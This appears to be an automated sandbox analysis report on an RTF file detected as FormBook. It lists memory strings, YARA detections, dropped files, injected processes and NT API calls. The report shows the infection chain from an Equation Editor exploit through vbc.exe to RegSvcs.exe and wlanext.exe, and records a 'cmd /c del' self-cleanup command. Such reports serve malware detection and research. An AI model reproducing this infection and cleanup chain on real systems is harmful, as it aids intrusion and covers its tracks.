          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000007.00000000.2115039811.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoz
          Source: explorer.exe, 00000007.00000000.2120867977.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFC30 NtOpenProcess,6_2_008BFC30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFC48 NtSetInformationFile,6_2_008BFC48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C0C40 NtGetContextThread,6_2_008C0C40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C1D80 NtSuspendThread,6_2_008C1D80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFD5C NtEnumerateKey,6_2_008BFD5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFE24 NtWriteVirtualMemory,6_2_008BFE24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFFFC NtCreateProcessEx,6_2_008BFFFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFF34 NtQueueApcThread,6_2_008BFF34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F700C4 NtCreateFile,LdrInitializeThunk,9_2_01F700C4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F707AC NtCreateMutant,LdrInitializeThunk,9_2_01F707AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F9F0 NtClose,LdrInitializeThunk,9_2_01F6F9F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F900 NtReadFile,LdrInitializeThunk,9_2_01F6F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_01F6FBB8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01F6FB68
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FB50 NtCreateKey,LdrInitializeThunk,9_2_01F6FB50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_01F6FAE8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_01F6FAD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FAB8 NtQueryValueKey,LdrInitializeThunk,9_2_01F6FAB8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01F6FDC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FD8C NtDelayExecution,LdrInitializeThunk,9_2_01F6FD8C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC60 NtMapViewOfSection,LdrInitializeThunk,9_2_01F6FC60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FFB4 NtCreateSection,LdrInitializeThunk,9_2_01F6FFB4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_01F6FED0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F701D4 NtSetValueKey,9_2_01F701D4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F71148 NtOpenThread,9_2_01F71148
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7010C NtOpenDirectoryObject,9_2_01F7010C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F710D0 NtOpenProcessToken,9_2_01F710D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70078 NtResumeThread,9_2_01F70078
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70060 NtQuerySection,9_2_01F70060
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70048 NtProtectVirtualMemory,9_2_01F70048
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F71930 NtSetContextThread,9_2_01F71930
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F938 NtWriteFile,9_2_01F6F938
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F8CC NtWaitForSingleObject,9_2_01F6F8CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FBE8 NtQueryVirtualMemory,9_2_01F6FBE8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FA50 NtEnumerateValueKey,9_2_01F6FA50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FA20 NtQueryInformationFile,9_2_01F6FA20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F71D80 NtSuspendThread,9_2_01F71D80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FD5C NtEnumerateKey,9_2_01F6FD5C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC90 NtUnmapViewOfSection,9_2_01F6FC90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70C40 NtGetContextThread,9_2_01F70C40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC48 NtSetInformationFile,9_2_01F6FC48
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC30 NtOpenProcess,9_2_01F6FC30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FFFC NtCreateProcessEx,9_2_01F6FFFC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FF34 NtQueueApcThread,9_2_01F6FF34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FEA0 NtReadVirtualMemory,9_2_01F6FEA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FE24 NtWriteVirtualMemory,9_2_01F6FE24
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099D60 NtCreateFile,9_2_00099D60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099E10 NtReadFile,9_2_00099E10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099E90 NtClose,9_2_00099E90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099F40 NtAllocateVirtualMemory,9_2_00099F40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099E8A NtClose,9_2_00099E8A
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: pp[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@12/8@3/3
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$wBU8MyzT.rtfJump to behavior
          Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\DGxsVlh
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE169.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: fqwBU8MyzT.rtfReversingLabs: Detection: 48%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000006.00000002.2151498598.00000000003E0000.00000040.00000001.sdmp
          Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000009.00000002.2401023696.00000000005D6000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00CB48FC push edx; retf 4_2_00CB48FD
